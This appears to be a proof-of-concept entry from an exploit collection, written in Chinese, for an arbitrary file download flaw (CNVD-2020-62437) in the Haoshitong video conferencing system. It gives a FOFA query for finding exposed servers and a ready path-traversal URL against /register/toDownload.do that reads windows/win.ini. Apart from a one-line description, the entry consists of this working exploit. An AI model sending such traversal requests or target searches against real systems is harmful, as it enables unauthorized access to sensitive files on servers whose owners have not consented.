Awesome-POC/Web应用漏洞/银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437.md
2022-05-17 17:43:20 +08:00

43 lines
690 B
Markdown

# 银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437
## 漏洞描述
银澎云计算 好视通视频会议系统 存在任意文件下载,攻击者可以通过漏洞获取敏感信息
## 漏洞影响
```
银澎云计算 好视通视频会议系统
```
## FOFA
```
app="Hanming-Video-Conferencing"
```
## 漏洞复现
登录页面如下
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101930170.png)
漏洞Url为
```plain
https://xxx.xxx.xxx.xxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini
```
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101930402.png)
##